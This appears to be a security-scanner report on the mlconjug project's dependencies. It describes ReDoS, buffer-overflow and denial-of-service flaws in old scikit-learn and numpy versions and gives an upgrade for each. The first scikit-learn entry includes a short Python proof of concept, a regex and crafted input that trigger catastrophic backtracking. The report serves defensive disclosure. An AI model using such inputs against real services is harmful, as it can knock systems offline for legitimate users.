Find, fix and prevent vulnerabilities in your code.
medium severity
 Vulnerable module: scikitlearn
 Introduced through: scikitlearn@0.20.4
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4Remediation: Upgrade to scikitlearn@0.24.2.
Overview
scikitlearn is a Python module for machine learning built on top of SciPy and is distributed under the 3Clause BSD license.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in ARFF processing.
PoC
import re
p = re.compile(r'^\{\s*((\".*\"\'.*\'\S*)\s*,\s*)*(\".*\"\'.*\'\S*)\s*\}$')
re.findall(p, "{"+"',"*100)
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service  DDoS  attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(BC+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(BC+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node e '/A(BC+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node e '/A(BC+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
 CCC
 CC+C
 C+CC
 C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String  Number of C's  Number of steps 

ACCCX  3  38 
ACCCCX  4  71 
ACCCCCX  5  136 
ACCCCCCCCCCCCCCX  14  65,553 
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade scikitlearn
to version 0.24.2 or higher.
References
low severity
 Vulnerable module: numpy
 Introduced through: numpy@1.16.6, scipy@1.2.3 and others
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › numpy@1.16.6Remediation: Upgrade to numpy@1.22.0.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scipy@1.2.3 › numpy@1.16.6Remediation: Upgrade to scipy@1.9.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4 › numpy@1.16.6

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4 › scipy@1.2.3 › numpy@1.16.6
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the array_from_pyobj
function of fortranobject.c
. This may allow an attacker to conduct Denial of Service by carefully constructing an array with negative values.
Remediation
Upgrade numpy
to version 1.22.0 or higher.
References
low severity
 Vulnerable module: numpy
 Introduced through: numpy@1.16.6, scipy@1.2.3 and others
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › numpy@1.16.6Remediation: Upgrade to numpy@1.21.0.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scipy@1.2.3 › numpy@1.16.6Remediation: Upgrade to scipy@1.9.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4 › numpy@1.16.6

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4 › scipy@1.2.3 › numpy@1.16.6
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Buffer Overflow in the PyArray_NewFromDescr_int
function of ctors.c
when specifying arrays of large dimensions (over 32) from Python code.
Remediation
Upgrade numpy
to version 1.21.0rc1 or higher.
References
low severity
 Vulnerable module: numpy
 Introduced through: numpy@1.16.6, scipy@1.2.3 and others
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › numpy@1.16.6Remediation: Upgrade to numpy@1.22.0.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scipy@1.2.3 › numpy@1.16.6Remediation: Upgrade to scipy@1.9.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4 › numpy@1.16.6

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4 › scipy@1.2.3 › numpy@1.16.6
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the numpy.core
component, which may allow attackers to fail the APIs via constructing specific string objects.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commonsfileupload:commonsfileupload.
Crash  An attacker sending crafted requests that could cause the system to crash. For Example, npm
ws
package
Remediation
Upgrade numpy
to version 1.22.0rc1 or higher.
References
low severity
 Vulnerable module: numpy
 Introduced through: numpy@1.16.6, scipy@1.2.3 and others
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › numpy@1.16.6Remediation: Upgrade to numpy@1.22.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scipy@1.2.3 › numpy@1.16.6Remediation: Upgrade to scipy@1.9.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4 › numpy@1.16.6

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4 › scipy@1.2.3 › numpy@1.16.6
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing returnvalue validation in the PyArray_DescrNew
function, which may allow attackers to conduct Denial of Service attacks by repetitively creating and sort arrays.
Note: This may likely only happen if application memory is already exhausted, as it requires the newdescr
object of the PyArray_DescrNew
to evaluate to NULL
.
Remediation
Upgrade numpy
to version 1.22.2 or higher.
References
low severity
 Vulnerable module: scikitlearn
 Introduced through: scikitlearn@0.20.4
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikitlearn@0.20.4Remediation: Upgrade to scikitlearn@0.24.2.
Overview
scikitlearn is a Python module for machine learning built on top of SciPy and is distributed under the 3Clause BSD license.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the _RE_TYPE_NOMINAL
regular expression which is evaluated in _decode_attribute
.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service  DDoS  attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(BC+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(BC+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node e '/A(BC+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node e '/A(BC+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
 CCC
 CC+C
 C+CC
 C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String  Number of C's  Number of steps 

ACCCX  3  38 
ACCCCX  4  71 
ACCCCCX  5  136 
ACCCCCCCCCCCCCCX  14  65,553 
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade scikitlearn
to version 0.24.2 or higher.